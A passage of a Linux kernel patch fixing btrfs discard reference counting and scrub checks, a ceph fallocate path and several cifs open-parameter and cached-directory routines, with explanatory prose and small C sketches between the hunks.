+ 				       struct btrfs_block_group *block_group)
+ {
++	bool queued;
++
+ 	spin_lock(&discard_ctl->lock);
+ 
++	queued = !list_empty(&block_group->discard_list);
++
+ 	if (!btrfs_run_discard_work(discard_ctl)) {
+ 		spin_unlock(&discard_ctl->lock);
+ 		return;
+@@ -120,6 +127,8 @@ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 	block_group->discard_eligible_time = (ktime_get_ns() +
+ 					      BTRFS_DISCARD_UNUSED_DELAY);
+ 	block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
++	if (!queued)
++		btrfs_get_block_group(block_group);
+ 	list_add_tail(&block_group->discard_list,
+ 		      &discard_ctl->discard_list[BTRFS_DISCARD_INDEX_UNUSED]);
+ 
+@@ -130,6 +139,7 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				     struct btrfs_block_group *block_group)
+ {
+ 	bool running = false;
++	bool queued = false;
+ 
+ 	spin_lock(&discard_ctl->lock);
+ 
+@@ -139,7 +149,16 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 	}
+ 
+ 	block_group->discard_eligible_time = 0;
++	queued = !list_empty(&block_group->discard_list);
+ 	list_del_init(&block_group->discard_list);
++	/*
++	 * If the block group is currently running in the discard workfn, we
++	 * don't want to deref it, since it's still being used by the workfn.
++	 * The workfn will notice this case and deref the block group when it is
++	 * finished.
++	 */
++	if (queued && !running)
++		btrfs_put_block_group(block_group);
+ 
+ 	spin_unlock(&discard_ctl->lock);
+ 
+@@ -212,10 +231,12 @@ again:
+ 	if (block_group && now >= block_group->discard_eligible_time) {
+ 		if (block_group->discard_index == BTRFS_DISCARD_INDEX_UNUSED &&
+ 		    block_group->used != 0) {
+-			if (btrfs_is_block_group_data_only(block_group))
++			if (btrfs_is_block_group_data_only(block_group)) {
+ 				__add_to_discard_list(discard_ctl, block_group);
+-			else
++			} else {
+ 				list_del_init(&block_group->discard_list);
++				btrfs_put_block_group(block_group);
++			}
+ 			goto again;
+ 		}
+ 		if (block_group->discard_state == BTRFS_DISCARD_RESET_CURSOR) {
+@@ -502,6 +523,15 @@ static void btrfs_discard_workfn(struct work_struct *work)
+ 	spin_lock(&discard_ctl->lock);
+ 	discard_ctl->prev_discard = trimmed;
+ 	discard_ctl->prev_discard_time = now;
++	/*
++	 * If the block group was removed from the discard list while it was
++	 * running in this workfn, then we didn't deref it, since this function
++	 * still owned that reference. But we set the discard_ctl->block_group
++	 * back to NULL, so we can use that condition to know that now we need
++	 * to deref the block_group.
++	 */
++	if (discard_ctl->block_group == NULL)
++		btrfs_put_block_group(block_group);
+ 	discard_ctl->block_group = NULL;
+ 	__btrfs_discard_schedule_work(discard_ctl, now, false);
+ 	spin_unlock(&discard_ctl->lock);
+@@ -638,8 +668,12 @@ void btrfs_discard_punt_unused_bgs_list(struct btrfs_fs_info *fs_info)
+ 	list_for_each_entry_safe(block_group, next, &fs_info->unused_bgs,
+ 				 bg_list) {
+ 		list_del_init(&block_group->bg_list);
+-		btrfs_put_block_group(block_group);
+ 		btrfs_discard_queue_work(&fs_info->discard_ctl, block_group);
++		/*
++		 * This put is for the get done by btrfs_mark_bg_unused.
++		 * Queueing discard incremented it for discard's reference.
++		 */
++		btrfs_put_block_group(block_group);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -669,6 +703,7 @@ static void btrfs_discard_purge_list(struct btrfs_discard_ctl *discard_ctl)
+ 			if (block_group->used == 0)
+ 				btrfs_mark_bg_unused(block_group);
+ 			spin_lock(&discard_ctl->lock);
++			btrfs_put_block_group(block_group);
+ 		}
+ 	}
+ 	spin_unlock(&discard_ctl->lock);
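
All of the discard.c hunks enforce a single invariant: a block group holds one extra reference for as long as it sits on any discard list, and if it is dequeued while the workfn is processing it, the workfn drops that reference itself when it finishes. A compilable miniature of the take-on-enqueue/conditional-drop-on-dequeue rule (types and names simplified):

    #include <stdbool.h>

    struct block_group {
    	int refs;
    	bool on_list;
    };

    static void bg_get(struct block_group *bg) { bg->refs++; }
    static void bg_put(struct block_group *bg) { bg->refs--; /* free at 0 */ }

    /* Enqueue takes a reference only on the empty-to-queued transition. */
    static void discard_enqueue(struct block_group *bg)
    {
    	if (!bg->on_list)
    		bg_get(bg);
    	bg->on_list = true;
    }

    /* Dequeue drops it, unless the worker is running this group right now;
     * the worker then drops the reference itself when it finishes. */
    static void discard_dequeue(struct block_group *bg, bool running_in_worker)
    {
    	bool queued = bg->on_list;

    	bg->on_list = false;
    	if (queued && !running_in_worker)
    		bg_put(bg);
    }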
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 196c4c6ed1ed8..c5d8dc112fd58 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -2036,20 +2036,33 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	 * a) don't have an extent buffer and
+ 	 * b) the page is already kmapped
+ 	 */
+-	if (sblock->logical != btrfs_stack_header_bytenr(h))
++	if (sblock->logical != btrfs_stack_header_bytenr(h)) {
+ 		sblock->header_error = 1;
+-
+-	if (sector->generation != btrfs_stack_header_generation(h)) {
+-		sblock->header_error = 1;
+-		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad bytenr, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_bytenr(h),
++			      sblock->logical);
++		goto out;
+ 	}
+ 
+-	if (!scrub_check_fsid(h->fsid, sector))
++	if (!scrub_check_fsid(h->fsid, sector)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad fsid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->fsid, sblock->dev->fs_devices->fsid);
++		goto out;
++	}
+ 
+-	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid,
+-		   BTRFS_UUID_SIZE))
++	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid, BTRFS_UUID_SIZE)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad chunk tree uuid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->chunk_tree_uuid, fs_info->chunk_tree_uuid);
++		goto out;
++	}
+ 
+ 	shash->tfm = fs_info->csum_shash;
+ 	crypto_shash_init(shash);
+@@ -2062,9 +2075,27 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	}
+ 
+ 	crypto_shash_final(shash, calculated_csum);
+-	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size))
++	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size)) {
+ 		sblock->checksum_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad csum, has " CSUM_FMT " want " CSUM_FMT,
++			      sblock->logical, sblock->mirror_num,
++			      CSUM_FMT_VALUE(fs_info->csum_size, on_disk_csum),
++			      CSUM_FMT_VALUE(fs_info->csum_size, calculated_csum));
++		goto out;
++	}
++
++	if (sector->generation != btrfs_stack_header_generation(h)) {
++		sblock->header_error = 1;
++		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad generation, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_generation(h),
++			      sector->generation);
++	}
+ 
++out:
+ 	return sblock->header_error || sblock->checksum_error;
+ }
+ 
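
The scrub rewrite turns the silent flag-setting into fail-fast checks, each with its own rate-limited message, and runs the generation check last; unlike the others it does not short-circuit, since a generation mismatch sets both header_error and generation_error without masking a checksum problem. The resulting first-failure-wins shape, compressed into a standalone sketch:

    #include <stdio.h>

    /* Illustrative only: the first failing check reports and short-circuits,
     * mirroring the goto-out flow of scrub_checksum_tree_block() above. */
    static int validate(int bad_bytenr, int bad_fsid, int bad_uuid,
    		    int bad_csum, int bad_gen)
    {
    	if (bad_bytenr) { printf("bad bytenr\n");          return 1; }
    	if (bad_fsid)   { printf("bad fsid\n");            return 1; }
    	if (bad_uuid)   { printf("bad chunk tree uuid\n"); return 1; }
    	if (bad_csum)   { printf("bad csum\n");            return 1; }
    	if (bad_gen)    { printf("bad generation\n");      return 1; }
    	return 0;
    }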
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 5895797f3104a..02414437d8abf 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2095,6 +2095,9 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	loff_t endoff = 0;
+ 	loff_t size;
+ 
++	dout("%s %p %llx.%llx mode %x, offset %llu length %llu\n", __func__,
++	     inode, ceph_vinop(inode), mode, offset, length);
++
+ 	if (mode != (FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 
+@@ -2129,6 +2132,10 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	if (ret < 0)
+ 		goto unlock;
+ 
++	ret = file_modified(file);
++	if (ret)
++		goto put_caps;
++
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 	ceph_fscache_invalidate(inode, false);
+ 	ceph_zero_pagecache_range(inode, offset, length);
+@@ -2144,6 +2151,7 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	}
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 
++put_caps:
+ 	ceph_put_cap_refs(ci, got);
+ unlock:
+ 	inode_unlock(inode);
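
The ceph fallocate fix inserts the standard write-path call to file_modified(), which clears suid/sgid bits and updates timestamps before data changes; because it can fail, it also needs its own unwind label so the cap references taken just above are released. The unwind shape in isolation (a generic sketch, not the ceph code):

    #include <errno.h>

    /* Each new failure point unwinds exactly what was acquired before it. */
    static int op_with_unwind(int got_caps, int modified_ok)
    {
    	int ret;

    	if (!got_caps)
    		return -EAGAIN;		/* nothing to undo yet */

    	if (!modified_ok) {
    		ret = -EPERM;		/* file_modified() failed */
    		goto put_caps;
    	}

    	ret = 0;			/* ... do the real work ... */
    put_caps:
    	/* drop the cap references here */
    	return ret;
    }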
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 60399081046a5..75d5e06306ea5 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -14,6 +14,7 @@
+ 
+ static struct cached_fid *init_cached_dir(const char *path);
+ static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
+ 
+ static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+ 						    const char *path,
+@@ -181,12 +182,13 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE);
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = pfid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -220,8 +222,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 		goto oshr_free;
+ 	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
++	cfid->tcon = tcon;
++	cfid->is_open = true;
+ 
+ 	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+ 	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+@@ -233,12 +235,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-
+ 	smb2_parse_contexts(server, o_rsp,
+ 			    &oparms.fid->epoch,
+ 			    oparms.fid->lease_key, &oplock,
+ 			    NULL, NULL);
+-
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+ 	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+ 		goto oshr_free;
+@@ -259,9 +261,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	cfid->dentry = dentry;
+-	cfid->tcon = tcon;
+ 	cfid->time = jiffies;
+-	cfid->is_open = true;
+ 	cfid->has_lease = true;
+ 
+ oshr_free:
+@@ -271,7 +271,7 @@ oshr_free:
+ 	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+ 	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+ 	spin_lock(&cfids->cfid_list_lock);
+-	if (!cfid->has_lease) {
++	if (rc && !cfid->has_lease) {
+ 		if (cfid->on_list) {
+ 			list_del(&cfid->entry);
+ 			cfid->on_list = false;
+@@ -280,13 +280,27 @@ oshr_free:
+ 		rc = -ENOENT;
+ 	}
+ 	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++	 * Release the lease reference so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
+ 	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
+ 		free_cached_dir(cfid);
+ 		cfid = NULL;
+ 	}
+ 
+-	if (rc == 0)
++	if (rc == 0) {
+ 		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
+ 
+ 	return rc;
+ }
+@@ -335,6 +349,7 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
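
The cached_dir rework revolves around the two-references comment above: open_cached_dir() finishes with one reference for the caller and one for the lease, and drops the lease reference through the kref machinery whenever no read lease was actually granted, so the handle closes as soon as the caller puts its own reference. A compilable miniature of that kref-style discipline (names hypothetical):

    #include <stdlib.h>

    struct cfid {
    	int refcount;
    };

    static void cfid_release(struct cfid *c)
    {
    	free(c);
    }

    static void cfid_put(struct cfid *c)
    {
    	if (--c->refcount == 0)
    		cfid_release(c);
    }

    /* Open path: start with caller + lease references, then drop the lease
     * reference if the server did not grant a lease after all. */
    static struct cfid *cfid_open(int got_lease)
    {
    	struct cfid *c = calloc(1, sizeof(*c));

    	if (!c)
    		return NULL;
    	c->refcount = 2;
    	if (!got_lease)
    		cfid_put(c);	/* handle now closes when the caller puts */
    	return c;
    }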
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+index fa480d62f3137..a6c7566a01821 100644
+--- a/fs/cifs/cifsacl.c
++++ b/fs/cifs/cifsacl.c
+@@ -1423,14 +1423,15 @@ static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 	tcon = tlink_tcon(tlink);
+ 	xid = get_xid();
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (!rc) {
+@@ -1489,14 +1490,15 @@ int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 	else
+ 		access_flags = WRITE_DAC;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc) {
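
This is the first of roughly a dozen hunks in this patch converting field-by-field assignment of struct cifs_open_parms into one compound-literal assignment. Beyond brevity, the point is correctness: members not named in the literal are zero-initialized rather than left holding stale stack contents, which is why the explicit .reconnect = false lines can simply disappear. In miniature:

    #include <stdbool.h>

    struct open_parms {
    	int desired_access;
    	int disposition;
    	bool reconnect;
    };

    static void demo(void)
    {
    	struct open_parms oparms;

    	/* Compound literal: every member not named is zeroed, so
    	 * oparms.reconnect is reliably false without saying so. */
    	oparms = (struct open_parms) {
    		.desired_access = 1,
    		.disposition = 2,
    	};
    	(void)oparms;
    }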
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 1724066c15365..6b8f59912f705 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -5314,14 +5314,15 @@ CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	int rc;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = fileName;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 384c7c0e10889..0006b1ca02036 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2843,72 +2843,48 @@ ip_rfc1001_connect(struct TCP_Server_Info *server)
+ 	 * negprot - BB check reconnection in case where second
+ 	 * sessinit is sent but no second negprot
+ 	 */
+-	struct rfc1002_session_packet *ses_init_buf;
+-	unsigned int req_noscope_len;
+-	struct smb_hdr *smb_buf;
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
+ 
+-	ses_init_buf = kzalloc(sizeof(struct rfc1002_session_packet),
+-			       GFP_KERNEL);
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+ 
+-	if (ses_init_buf) {
+-		ses_init_buf->trailer.session_req.called_len = 32;
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		if (server->server_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      server->server_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      DEFAULT_CIFS_CALLED_NAME,
+-				      RFC1001_NAME_LEN_WITH_NULL);
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+ 
+-		ses_init_buf->trailer.session_req.calling_len = 32;
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		/*
+-		 * calling name ends in null (byte 16) from old smb
+-		 * convention.
+-		 */
+-		if (server->workstation_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      server->workstation_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      "LINUX_CIFS_CLNT",
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-
+-		ses_init_buf->trailer.session_req.scope1 = 0;
+-		ses_init_buf->trailer.session_req.scope2 = 0;
+-		smb_buf = (struct smb_hdr *)ses_init_buf;
+-
+-		/* sizeof RFC1002_SESSION_REQUEST with no scopes */
+-		req_noscope_len = sizeof(struct rfc1002_session_packet) - 2;
+-
+-		/* == cpu_to_be32(0x81000044) */
+-		smb_buf->smb_buf_length =
+-			cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | req_noscope_len);
+-		rc = smb_send(server, smb_buf, 0x44);
+-		kfree(ses_init_buf);
+-		/*
+-		 * RFC1001 layer in at least one server
+-		 * requires very short break before negprot
+-		 * presumably because not expecting negprot
+-		 * to follow so fast.  This is a simple
+-		 * solution that works without
+-		 * complicating the code and causes no
+-		 * significant slowing down on mount
+-		 * for everyone else
+-		 */
+-		usleep_range(1000, 2000);
+-	}
+ 	/*
+-	 * else the negprot may still work without this
+-	 * even though malloc failed
++	 * As per rfc1002, @len must be the number of bytes that follow the
++	 * length field of an rfc1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * The RFC1001 layer in at least one server requires a very short break
++	 * before negprot, presumably because it does not expect negprot to
++	 * follow so fast.  This is a simple solution that works without
++	 * complicating the code and causes no significant slowdown on mount
++	 * for everyone else.
+ 	 */
++	usleep_range(1000, 2000);
+ 
+ 	return rc;
+ }
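
The rewritten ip_rfc1001_connect() replaces the magic 0x44 with arithmetic: per RFC 1002 the length field counts only the bytes that follow it, so the payload length is sizeof(req) minus the offset of the trailer. A standalone check of that offsetof() pattern (the struct layout here is simplified and hypothetical):

    #include <stddef.h>
    #include <stdint.h>
    #include <stdio.h>

    struct session_packet {
    	uint8_t type;
    	uint8_t flags;
    	uint16_t length;	/* counts only the bytes after this header */
    	char trailer[68];	/* called/calling names etc. */
    };

    int main(void)
    {
    	size_t len = sizeof(struct session_packet) -
    		     offsetof(struct session_packet, trailer);

    	printf("payload bytes after header: %zu\n", len);	/* prints 68 */
    	return 0;
    }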
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+index 8b1c371585564..e382b794acbed 100644
+--- a/fs/cifs/dir.c
++++ b/fs/cifs/dir.c
+@@ -295,15 +295,16 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
+-	oparms.mode = mode;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 542f22db5f46f..6f5fbbbebec33 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -260,14 +260,15 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc)
+@@ -848,14 +849,16 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = &cfile->fid;
+-	oparms.reconnect = true;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
+ 
+ 	/*
+ 	 * Can not refresh inode by passing in file_info buf to be returned by
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index 0c9b619e4386b..8901d884f5b98 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -508,14 +508,15 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 		return PTR_ERR(tlink);
+ 	tcon = tlink_tcon(tlink);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+@@ -1513,14 +1514,15 @@ cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = DELETE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc != 0)
+@@ -2107,15 +2109,16 @@ cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+ 	if (to_dentry->d_parent != from_dentry->d_parent)
+ 		goto do_rename_exit;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	/* open the file to be renamed -- we need DELETE perms */
+-	oparms.desired_access = DELETE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = from_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc == 0) {
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index a5a097a699837..d937eedd74fb6 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
